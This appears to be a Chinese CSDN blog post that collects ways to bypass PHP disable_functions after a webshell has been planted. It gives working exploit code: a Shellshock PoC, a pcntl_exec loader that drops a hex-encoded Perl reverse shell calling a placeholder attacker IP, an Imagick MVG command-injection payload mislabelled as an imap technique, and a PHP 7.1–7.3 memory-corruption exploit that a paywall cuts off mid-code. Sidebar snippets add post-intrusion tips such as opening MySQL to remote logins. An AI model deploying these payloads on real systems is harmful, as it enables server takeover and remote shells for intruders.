linux下php中的disable_function的几种绕过方式

最新推荐文章于 2023-02-23 19:00:00 发布
最新推荐文章于 2023-02-23 19:00:00 发布
阅读量1.7k 收藏 2
点赞数 1
分类专栏: web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jia3643/article/details/104200164
版权
本文介绍了在Linux系统中,当PHP的disable_function禁用了某些关键函数时的绕过方法,包括利用CVE-2014-6271漏洞、pcntl_exec函数、imap扩展以及PHP 7.1-7.3的disable_functions bypass策略。内容适用于PHP 7.0到7.3版本,适合网络安全和PHP开发人员参考。
摘要由CSDN通过智能技术生成

php disabled_function

若转载请于明显处标明出处:https://blog.csdn.net/jia3643

写入shell之后,经常会遇到disabled_function禁用了关键函数,想总结一下绕过方式(网安新手,不全或者错误之处希望大佬们多多指教)
有些时候可能不能用了,但是大部分情况下可以使用

常见危险函数如下,如果没有完全禁用可以尝试利用未被禁用的函数

system,shell_exec,passthru,exec,popen,proc_open,pcntl_exec,mail,putenv,apache_setenv,mb_send_mail,assert,dl,set_time_limit,ignore_user_abort,symlink,link,map_open,imap_mail,ini_set,ini_alter,其他函数

1.CVE-2014-6271 要求 PHP < 5.6.2

<?php 
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) 
# Google Dork: none # Date: 10/31/2014 
# Exploit Author: Ryan King (Starfall) 
# Vendor Homepage: http://php.net # Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror 
# Version: 5.* (tested on 5.6.2) 
# Tested on: Debian 7 and CentOS 5 and 6 
# CVE: CVE-2014-6271
function shellshock($cmd) {
    // Execute a command via CVE-2014-6271 @mail.c:283    
$tmp = tempnam(".","data");    
putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");    
// In Safe Mode, the user may only alter environment variableswhose names   
// begin with the prefixes supplied by this directive.    
// By default, users will only be able to set environment variablesthat    
// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty,   
// PHP will let the user modify ANY environment variable!    mail("a@127.0.0.1","","","","-bv"); 
// -bv so we don't actuallysend any mail    
$output = @file_get_contents($tmp);   
@unlink($tmp);   
if($output != "") return $output;   
else return "No output, or not vuln."; 
}                   
echo shellshock($_REQUEST["cmd"]); 
?>

2.开启了 pcntl 扩展,就可以利用 pcntl_exec 函数来执行命令,要求 PHP 4 >= 4.2.0, PHP 5 on linux

<?php 
/*******************************
 *查看phpinfo编译参数--enable-pcntl
 *作者 Spider
 *nc -vvlp 443
********************************/
 
$ip = 'xxx.xxx.xxx.xxx';
$port = '443';
$file = '/tmp/bc.pl';
 
header("content-Type: text/html; charset=gb2312");
 
if(function_exists('pcntl_exec')) {
   
        $data = "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x20\x2d\x77\x0d\x0a\x23\x0d\x0a".
                "\x0d\x0a\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74\x3b\x20\x20\x20\x20\x0d\x0a\x75\x73\x65\x20".
                "\x53\x6f\x63\x6b\x65\x74\x3b\x0d\x0a\x75\x73\x65\x20\x49\x4f\x3a\x3a\x48\x61\x6e\x64\x6c\x65".
                "\x3b\x0d\x0a\x0d\x0a\x6d\x79\x20\x24\x72\x65\x6d\x6f\x74\x65\x5f\x69\x70\x20\x3d\x20\x27".$ip.
                "\x27\x3b\x0d\x0a\x6d\x79\x20\x24\x72\x65\x6d\x6f\x74\x65\x5f\x70\x6f\x72\x74\x20\x3d\x20\x27".$port.
                "\x27\x3b\x0d\x0a\x0d\x0a\x6d\x79\x20\x24\x70\x72\x6f\x74\x6f\x20\x3d\x20\x67\x65\x74\x70\x72".
                "\x6f\x74\x6f\x62\x79\x6e\x61\x6d\x65\x28\x22\x74\x63\x70\x22\x29\x3b\x0d\x0a\x6d\x79\x20\x24".
                "\x70\x61\x63\x6b\x5f\x61\x64\x64\x72\x20\x3d\x20\x73\x6f\x63\x6b\x61\x64\x64\x72\x5f\x69\x6e".
                "\x28\x24\x72\x65\x6d\x6f\x74\x65\x5f\x70\x6f\x72\x74\x2c\x20\x69\x6e\x65\x74\x5f\x61\x74\x6f".
                "\x6e\x28\x24\x72\x65\x6d\x6f\x74\x65\x5f\x69\x70\x29\x29\x3b\x0d\x0a\x6d\x79\x20\x24\x73\x68".
                "\x65\x6c\x6c\x20\x3d\x20\x27\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x69\x27\x3b\x0d\x0a\x73\x6f".
                "\x63\x6b\x65\x74\x28\x53\x4f\x43\x4b\x2c\x20\x41\x46\x5f\x49\x4e\x45\x54\x2c\x20\x53\x4f\x43".
                "\x4b\x5f\x53\x54\x52\x45\x41\x4d\x2c\x20\x24\x70\x72\x6f\x74\x6f\x29\x3b\x0d\x0a\x53\x54\x44".
                "\x4f\x55\x54\x2d\x3e\x61\x75\x74\x6f\x66\x6c\x75\x73\x68\x28\x31\x29\x3b\x0d\x0a\x53\x4f\x43".
                "\x4b\x2d\x3e\x61\x75\x74\x6f\x66\x6c\x75\x73\x68\x28\x31\x29\x3b\x0d\x0a\x63\x6f\x6e\x6e\x65".
                "\x63\x74\x28\x53\x4f\x43\x4b\x2c\x24\x70\x61\x63\x6b\x5f\x61\x64\x64\x72\x29\x20\x6f\x72\x20".
                "\x64\x69\x65\x20\x22\x63\x61\x6e\x20\x6e\x6f\x74\x20\x63\x6f\x6e\x6e\x65\x63\x74\x3a\x24\x21".
                "\x22\x3b\x0d\x0a\x6f\x70\x65\x6e\x20\x53\x54\x44\x49\x4e\x2c\x20\x22\x3c\x26\x53\x4f\x43\x4b".
                "\x22\x3b\x0d\x0a\x6f\x70\x65\x6e\x20\x53\x54\x44\x4f\x55\x54\x2c\x20\x22\x3e\x26\x53\x4f\x43".
                "\x4b\x22\x3b\x0d\x0a\x6f\x70\x65\x6e\x20\x53\x54\x44\x45\x52\x52\x2c\x20\x22\x3e\x26\x53\x4f".
                "\x43\x4b\x22\x3b\x0d\x0a\x73\x79\x73\x74\x65\x6d\x28\x24\x73\x68\x65\x6c\x6c\x29\x3b\x0d\x0a".
                "\x63\x6c\x6f\x73\x65\x20\x53\x4f\x43\x4b\x3b\x0d\x0a\x65\x78\x69\x74\x20\x30\x3b\x0a";
        $fp = fopen($file,'w');
        $key = fputs($fp,$data);
        fclose($fp);
        if(!$key) exit('写入'.$file.'失败');
        chmod($file,0777);
        pcntl_exec($file);
        unlink($file);
} else {
   
        echo '不支持pcntl扩展';
}
?>

3. 如果网站安装了 imap 拓展,并启用,且 php.inienable_insecure_rsh 处于 On 状态(默认既是On 状态)时,可以通过如下代码写入 webshell

  <?php 
  echo "Disable Functions: " . ini_get('disable_functions') . "\n"; 
   
  $command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd']; 
  if ($command == '') {
    
      $command = 'id'; 
  } 
   
  $exploit = <<<EOF 
  push graphic-context 
  viewbox 0 0 640 480 
  fill 'url(https://example.com/image.jpg"|$command")' 
  pop graphic-context 
  EOF; 
   
  file_put_contents("KKKK.mvg", $exploit); 
  $thumb = new Imagick(); 
  $thumb->readImage('KKKK.mvg'); 
  $thumb->writeImage('KKKK.png'); 
  $thumb->clear(); 
  $thumb->destroy(); 
  unlink("KKKK.mvg"); 
  unlink("KKKK.png"); 
  ?>

4 PHP 7.1-7.3 disable_functions bypass

  <?php
  $cmd = "id";
  $n_alloc = 10; # increase this value if you get segfaults
  class MySplFixedArray extends SplFixedArray {
   
      public static $leak;
  }
  class Z implements JsonSerializable {
   
      public function write(&$str, $p, $v, $n = 8) {
   
        $i = 0;
        for($i = 0; $i < $n; $i++) {
   
          $str[$p + $i] = chr($v & 0xff);
          $v >>= 8;
        }
      }
      public function str2ptr(&$str, $p = 0, $s = 8) {
   
          $address = 0;
          for($j = $s-1; $j >= 0; $j--) {
   
              $address <<= 8;
              $address |= ord($str[$p+$j]);
          }
          return $address;
      }
      public function ptr2str($ptr, $m = 8) {
   
          $out = "";
          for ($i=0; $i < $m; $i++) {
   
              $out .= chr($ptr & 0xff);
              $ptr >>= 8;
          }
          return
最低0.47元/天 解锁文章
流水~天涯
关注
专栏目录
PHP WebShell 免杀
悦分享
08-01 6294
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。而php做为一门动态语言,其灵活性很高,因此一直以来Webshell的绕过与检测之间不断的产生着化学反应。Webshell绕过的本质其实是针对不同的检测给予不同的绕过方式,因此首先要了解Webshell是如何检测的。...
【web安全】你的open_basedir安全吗?
HBohan的博客
02-24 634
一、open_basedir 看一下php.ini里面的描述: ; open_basedir, if set, limits all file operations to the defined directory ; and below. This directive makes most sense if used in a per-directory or ; per-virtualhost web server configuration file. This directive is ; *NO
利用PHP扩展模块突破Disable_functions执行命令
09-13
利用PHP扩展模块突破Disable_functions执行命令
linux 把动态库静态化,disable_functions绕过小结
weixin_29163857的博客
05-13 353
本文仅作为学习记录,如有侵权,请联系删除!环境搭建由于大部分的disable_functions绕过技巧是针对Linux操作系统的,所以需要搭建环境:本次搭建的环境为:Ubuntu 16.04 + php5.6 + apache2.4.18apache环境搭建:sudo apt-get install apache2php环境搭建:1、添加网易源:sudo add-apt-repository '...
linux+php禁用函数,工作笔记04----------禁用PHP危险函数
weixin_35473667的博客
03-16 395
禁用PHP函数1、禁用PHP安全函数:vim /usr/local/php/etc/php.inidisable_functions = system,exec,shell_exec,passthru,proc_open,proc_close, proc_get_status,checkdnsrr,getmxrrdisable_functions = getservbyport, syslog,...
disable_functions绕过总结
遇事不决冲冲冲
11-19 6626
提要 Linux PHP 环境,已知disable_functions=exec、passthru、popen、proc_open、shell_exec、system请写出两种有可能实现任意命令执行的方式 exec <?phpecho exec('whoami');?> — 执行一个外部程序 passthru <?phppassthru("whoami");?> — 执行外部程序并且显示原始输出
绕过disable_function
nextlubricate的博客
11-07 201
1、常规绕过:exec,shell_exec,system,passthru,popen,proc_open 查看 PHPinfo 看看哪些没有被写进ini配置文件,绕过限制。 2. 利用系统组件绕过 利用条件 windows环境 com组件(PHP5.4自带)(高版本扩展要自己添加) 3. 利用环境变量 LD_PRELOAD 来绕过 使用条件 Linux 操作系统 putenv() mail or error_log 存在可写的目录, 需要上传 .so 文件 4. 攻击 php-fpm/FastCGI 绕
CTFHub Bypass disable_function 利用LD_PRELOAD绕过
z2560088的博客
10-04 931
LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达到特定的目的。 putenv()用来改变或增加环境变量的内容. 参数.
无需sendmail:巧用LD_PRELOAD突破disable_functions
Coisini的博客
12-03 999
摘要:千辛万苦拿到的 webshell 居然无法执行系统命令,怀疑服务端 disable_functions 禁用了命令执行函数,通过环境变量 LD_PRELOAD 劫持系统函数,却又发现目标根本没安装 sendmail,无法执行命令的 webshell 是无意义的,看我如何突破! | 半月前逛“已黑网站列表”时复审一小电商网站,“列表”并未告知漏洞详情,简单浏览了下功能,只有注册、登录、下单...
linux命令执行绕过,命令执行绕过
weixin_39689687的博客
04-29 2123
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?命令执行过滤函数与绕过机制escapeshellcmd函数:字符串可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。(对可能进行欺骗命令执行函数的字符进行转义),下面来具体的看一下这个函数:再看一下源码(...
绕过disable_function总结
unexpectedthing的博客
03-27 4836
前言 有些时候,phpinfo()有disable_functions 蚁剑终端命令不起作用,就可能是df的问题 黑名单绕过 就是一些运维人员php命令执行的函数没禁用完 exec,passthru,shell_exec,eval,system,popen,proc_open(),pcntl_exec 前几种都比较简单 popen 打开进程文件指针 <?php $command=$_POST['cmd']; $handle = popen($command,"r"); while(!feof($
CTFHub技能树 Web进阶详解
weixin_45808483的博客
12-02 2392
PHP Bypass disable_function PHPdisabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 有四种绕过 disable_functions 的手法: 攻击后端组件,寻找存在命令注入的 web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞等等 寻找未禁用的漏网函数,常见的执行命令的函数有 system()、exec()、shell_exec()、passthru(),偏僻的popen()、proc_open
php.ini disable_functions 配置 无效,看我深夜如何绕过disable_functions拿到主机权限
weixin_42164685的博客
03-21 1029
找了一会找到一个上传点,尝试上传文件拿到shell用冰蝎连一下:三、开启外链拿到数据库然后尝试找他的数据库的配置文件,因为只能本地连接数据库不允许外链,所以我们可以先传一个小马登录他的数据库,然后在开启外链就ok:开启外链命令:GRANT ALL PRIVILEGES ON *.* TO ‘root’@'%’ IDENTIFIED BY ‘外链登录密码’ WITH GRANT OPTION;尝试用...
简单讲解如何绕过PHP disable_function
h0ld1rs的博客
11-01 4661
前言 在渗透测试,有时遇到拿到webshell后无法执行命令的情况,为了成功提权,需要我们绕过disable_function disable_function简介 disable_functions是php.ini的一个设置选项,可以用来设置PHP环境禁止使用某些函数,通常是网站管理员为了安全起见,用来禁用某些危险的命令执行函数等。(eval并非PHP函数,放在disable_functions是无法禁用的,若要禁用需要用到PHP的扩展Suhosin。) 绕过方法 1. 寻找未禁用的函数 黑名单
Linux下的命令执行绕过技巧合集(渗透测试专用)
最新发布
Thunderclap的博客
02-23 3816
Linux下的命令执行绕过技巧合集(渗透测试专用)
PHP绕过disable_function限制
qq_44657899的博客
10-19 2914
文章目录寻找未禁用函数 寻找未禁用函数 一些读取目录的函数: print_r(scandir("/")); var_dump(scandir("/")); 读取文件的函数: highlight_file('flag.php'); include('/flag'); show_source(); require();
绕过disable_functions限制
kuaindl的博客
02-09 1101
作用:运维人员通过disable_functions函数来禁用一些在PHP的一些“危险”函数,将其卸载php.in配置文件。 例如: passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status, papen,ini_alter,ini_restore,dl,openlog,readlink,symlink,popepassthru,link等。 其实disable_function函数也就是一种黑名单限制机制
php disable_function绕过
weixin_45794666的博客
03-03 3660
bypass disable_functions disable_functions是php.ini的一个设置选项,可以用来设置PHP环境禁止使用某些函数,通常是网站管理员为了安全起见,用来禁用某些危险的命令执行函数等。 要进行添加的话在php.ini添加即可,每个函数之间使用逗号隔开。 配置 打开php.ini,搜索disable_function,添加如下函数 eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_o
PHP漏洞规避:从ByteCTF实战到disable_function技巧
文章起源于对ByteCTF比赛一道名为"bypass_disable_function"的PHP题目探索,这促使作者深入研究了PHP绕过disable_function功能的方法。PHPdisable_function是防止某些危险函数执行的安全措施,但黑客可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值